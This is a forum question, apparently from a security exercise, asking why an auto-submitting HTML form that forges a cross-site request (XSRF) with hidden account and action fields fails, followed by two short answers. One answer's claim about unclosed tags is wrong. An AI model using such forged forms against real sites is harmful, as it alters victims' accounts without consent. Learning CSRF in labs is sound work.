I am having trouble submitting parameters to a website via an html code simulating an XSRF attack. I have the html below in which I have set the parameters for the action including an account #, routing #, action, and a value that need to reverse engineer through source code that represents the users session.

When ran, the site either returns "Changes Saved" indicating a successful XSRF attack or returns "XRSF Blocked" indicating I did not derive the fourth value correctly.

However, when I log in to the site and execute the script, nothing is returned and even the page forms are unchanged. I think something in my syntax is probably slightly off. Can someone assist?

<!DOCTYPE html>
<html>
<meta charset="UTF-8"/>
<title>XSRF</title>
</head>
<body onload='document.forms[0].submit();'>
<form action='some_php_file.php' method='POST'>
<input type='hidden' name='action' value='save'/>
<input type='hidden' name='account' value='3192332'/>
</form>
</body>
</html>

2 Answers

0
Community On

Your inputs have no closing tags.

<input type='hidden' name='action' value='save'
<input type='hidden' name='account' value='3192332'
0
frogman578 On

In order to post information, you need a submit input:

 <form action='some_php_file.php' method='POST'>
 <input type='hidden' name='action' value='save'/>
 <input type='hidden' name='account' value='3192332'/>
 <input type="submit" name="name" placeholder="placeholder"/>
 </form>

Hope this helps :-)